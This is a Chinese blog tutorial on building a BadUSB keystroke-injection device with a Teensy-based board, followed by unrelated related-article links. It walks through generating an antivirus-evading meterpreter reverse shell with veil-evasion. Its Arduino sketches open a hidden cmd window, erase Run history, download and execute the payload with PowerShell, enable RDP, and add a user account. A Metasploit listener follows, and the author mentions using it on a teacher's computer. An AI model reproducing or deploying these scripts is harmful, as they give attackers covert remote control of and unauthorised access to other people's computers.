所用硬件设备为烧鹅,烧鹅是RadioWar基于Teensy++ 2.0 AT90USB1286芯片设计的USB Rubber Ducky类开发板。 
使用veil编码meterpreter生成payload(经过编码的payload在杀软中仅能够存活几分钟),放到服务器上。插入烧鹅,模拟键盘输入,在cmd中下载payload,并执行。

Github:https://github.com/RadioWar/FireGoose

0x1 利用veil编码打造免杀的meterpreter 

root@kali:~# veil-evasion          //启动veil 
[>] Please enter a command: list    //查看可选列表 
26) python/meterpreter/rev_tcp

[>] Please enter a command: 26     //这里选择编号为26的payload 
[>] Please enter a command: set LHOST 192.168.31.233  //设置LHOST

[>] Please enter a command: generate             //对payload进行编码 
[*] Press [enter] for 'payload' 
[>] Please enter the base name for output files: a   //输入生成的payload名字 
[>] Please enter the number of your choice: 1 //选择编码方式

[*] Executable written to: /root/veil-output/compiled/a1.exe  //生成经过编码的payload位置

0x2 将执行代码写入badusb中 

使用Arduino IDE 写入,其中下载使用的是PowerShell,如果使用vbs那种方法,360会报警

 void setup() {               //初始化,这里的代码只执行一次

 delay();                //设置延时,让系统有足够的时间识别烧鹅,防止后续代码执行错乱。

 Keyboard.set_modifier(MODIFIERKEY_RIGHT_GUI);                // 按下Win键

 Keyboard.set_key1(KEY_R);                                   // 同时按下R键

 Keyboard.send_now();                                       // 发送Win+R

 delay();

 Keyboard.print("cmd.exe /T:01 /K mode CON: COLS=16 LINES=1");

 //开启极小的CMD窗口,设置文字和背景对比度尽可能相近,达到隐藏输入的目的

 Keyboard.set_key1(KEY_ENTER);

 Keyboard.send_now();

 delay();

 Keyboard.println("reg delete HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\RunMRU /f");                                           //利用注册表清除开始--运行的记录

 Keyboard.set_key1(KEY_ENTER);

 Keyboard.send_now();

 Keyboard.println("powershell (new- object System.Net.WebClient).DownloadFile('http://192.168.1.100 /a1.exe','D:\\1.exe')");                              //下载远程的payload

 Keyboard.set_key1(KEY_ENTER);

 Keyboard.send_now();

 Keyboard.set_modifier();

 Keyboard.set_key1();

 Keyboard.send_now();

 delay();                                               //设置延迟,等待下载完成

 Keyboard.println("d:\\1.exe");                            //执行打开命令

 Keyboard.set_key1(KEY_ENTER);

 delay();

 Keyboard.set_modifier();

 Keyboard.set_key1();

 Keyboard.set_modifier(MODIFIERKEY_ALT);

 Keyboard.set_key1(KEY_SPACE);

 Keyboard.set_key2(KEY_C);

 Keyboard.send_now();

 Keyboard.set_modifier();

 Keyboard.set_key1();

 Keyboard.set_key2();

 Keyboard.send_now();                                       //关闭cmd窗口

     }

    void loop()                                           //循环,这里的代码无限循环

     {

     }

对于win7开启3389,并加帐户,使用

 void setup() {                                                 //初始化,这里的代码只执行一次

    delay();                     //设置延时,让系统有足够的时间识别烧鹅,防止后续代码执行错乱。

    Keyboard.set_modifier(MODIFIERKEY_RIGHT_GUI);                  // 按下Win键

    Keyboard.set_key1(KEY_R);                                      // 同时按下R键

    Keyboard.send_now();                                           // 发送Win+R

    delay();

    Keyboard.print("cmd.exe /T:01 /K mode CON: COLS=16 LINES=1");

 //开启极小的CMD窗口,设置文字和背景对比度尽可能相近,达到隐藏输入的目的

    Keyboard.set_key1(KEY_ENTER);

    Keyboard.send_now();

    delay();

    Keyboard.println("REG ADD HKLM\\SYSTEM\\CurrentControlSet\\Control\\Terminal\" \"Server /v fDenyTSConnections /t REG_DWORD /d 00000000 /f");  //开启3389

    Keyboard.set_key1(KEY_ENTER);

    Keyboard.send_now();

    Keyboard.println("net user 123 123 /add");        //添加帐户

    Keyboard.set_modifier();

    Keyboard.set_key1();

    Keyboard.send_now();

    delay();

    Keyboard.set_modifier();

    Keyboard.set_key1();

    Keyboard.set_modifier(MODIFIERKEY_ALT);

    Keyboard.set_key1(KEY_SPACE);

    Keyboard.set_key2(KEY_C);

    Keyboard.send_now();

    Keyboard.set_modifier();

    Keyboard.set_key1();

    Keyboard.set_key2();

    Keyboard.send_now();          //关闭cmd

     }

    void loop()                                                    //循环,这里的代码无限循环

     {

     }

在学校中利用3389比meterpreter更加好用。开启3389,杀软不会提示。添加帐户,360会提示,电脑管家不会提示。

对于执行修改dns等一些需要输入中文的地方,就比较麻烦了,暂时还没想到好的方法,只想到模拟键盘输入 Shift + Ctrl开启输入法....利用条件比较苛刻

0x3  等待目标连接 

msfcli multi/handler PAYLOAD=windows/meterpreter/reverse_tcp LHOST=0.0.0.0 LPORT=4444 E  //开始监听,等待连接

将USB插入目标机器,执行相关命令 
目标机器上线

PS:玩法还有很多,还可以开启目标机器3389,新建用户等等,快要期末考试了,不要拦着我,我要去插下老师的机器......

利用烧鹅制作简单BadUSB,插谁谁怀孕的更多相关文章

  1. 利用 css 制作简单的提示框

    在网页开发中,为了提高用户体验,经常会用到一些提示框来引导用户,这里分享下一些简单的提示框的制作 1.首先类似一个长方形右上角一个关闭按钮 这里用到的主要是一些定位的知识,运用relative和abs ...

  2. 利用Python制作简单的小程序:IP查看器

    前言 说实话,查看电脑的IP,也挺无聊的,但是够简单,所以就从这里开始吧.IP地址在操作系统里就可以直接查看.但是除了IP地址,我们也想通过IP获取地理地址和网络运营商情况.IP地址和地理地址并没有固 ...

  3. 利用php制作简单的文本式留言板

    del.php 代码如下: <html><head ><meta charset="utf-8"><title>我的留言板</ ...

  4. 利用JAVA制作简单登录窗口

    import java.awt.Container; import java.awt.event.ActionEvent; import java.awt.event.ActionListener; ...

  5. 利用canvas制作简单的logo

    <!DOCTYPE html> <html> <head> <meta charset="utf-8" /> <title&g ...

  6. 利用Arduino快速制作Teensy BadUSB

    0×00 介绍 本文想以较简单的方式,叙述Arduino版BadUSB的制作过程.我知道在这之前已经有很多前辈都写过相关的文章,但小白可能还有点迷糊,所以这篇文章是快速带大家入门了解,我也是菜B大神不 ...

  7. 利用Arduino快速制作Teensy BadUSB, 攻击计算机

    BadUsb介绍 BadUSB是计算机安全领域的热门话题之一,该漏洞由Karsten Nohl和Jakob Lell共同发现,并在2014年的BlackHat安全大会上公布. 虽然已隔一两年,但还是有 ...

  8. Highcharts使用教程(1):制作简单图表

    今天我们要使用JavaScript图表Highcharts制作简单的柱形图,我们已经安装好Highcharts,让我们开始制作图表吧. 步骤一 在网页中添加一个div.设置id,设置图表长.高.代码如 ...

  9. 【203】利用UltraISO制作和刻录光盘映像的方法

    参考:利用UltraISO制作和刻录光盘映像的方法 软件:UltraISO注册版(制作镜像).rar 目录: 1.利用UltraISO制作光盘映像2.利用UltraISO刻录光盘映像文件 1.利用Ul ...

随机推荐

  1. 5.3.2 Eclipse集成开发环境的使用技巧

    Eclipse具有强大的编辑.调试.编译和打包功能,本节仅讲解Eclipse中最常用的功能. 1.将程序代码和注释字体变大 (1)启动Eclipse,选择“Windows”->“Preferen ...

  2. js高级程序设计(四)变量、作用域和内存问题

    基本类型和引用类型的值 ECMAScript 变量可能包含两种不同数据类型的值:基本类型值和引用类型值.基本类型值指的是 Undefined . Null . Boolean . Number 和 S ...

  3. 通过chrome 获取网站的cookie信息

    通过chrome 打开网页 审核元素 登录网站后 network列表中查看 home?开头列表项的 cookie信息

  4. VI编辑器学习笔记

    VIM的使用 VI是Linux系统中的一种编辑器,它的使用方法和界面与Unix平台十分相似,掌握了VIM的特殊,你可以感觉到它强大的功能与高效.Vim 相对来说较小,无论你使用任何Linux系统,你总 ...

  5. SAP销售订单状态修改(审核) 计划行自动产生需求,产生MD04需求

    不知道业务怎么配置的,创建销售单时,一堆计划行类别,什么CN,DN...都有,但是审核后需要计划行变更为CP,这样在MD04才能看到需求. 原有逻辑是弄个后台程序,审核后调一下,更新一下计划行,这样是 ...

  6. iOS开发错误日志

    错误提示:fatal error: file '/Applications/Xcode.app/Contents/Developer/Platforms/iPhoneSimulator.platfor ...

  7. Div CSS absolute与relative的区别小结

    absolute:绝对定位,CSS 写法“ position: absolute; ”,它的定位分两种情况,如下: 1. 没有设定 Top.Right.Bottom.Left 的情况,默认依据父级的“ ...

  8. 原创:整理编辑jQuery全部思维导图【附下载地址】

    主图 全部图已经打包:下载地址 2. 3. 4. 5. 6. 附上一点简单说明 Dom对象和jquer对象之间的转化 如何将一个jquery对象转换为DOM对象? test是一个span元素 var ...

  9. xampp搭建服务器环境、html5新的input类型

    怎么让别人看见你写的 先把你的文档放入htdocs里面 再输入网址: http://你的IP地址/文件名 就ok了例如我的 HTML5中的input类型: <input>标签规定用户可输入 ...

  10. 安装Adobe Dreamweaver CS6 免序列号 官方破解版

    Adobe Dreamweaver CS6 免序列号 官方破解版 Adobe Dreamweaver CS6是世界顶级软件厂商Adobe推出的一套可视化的网页开发工具,Dreamweaver CS6最 ...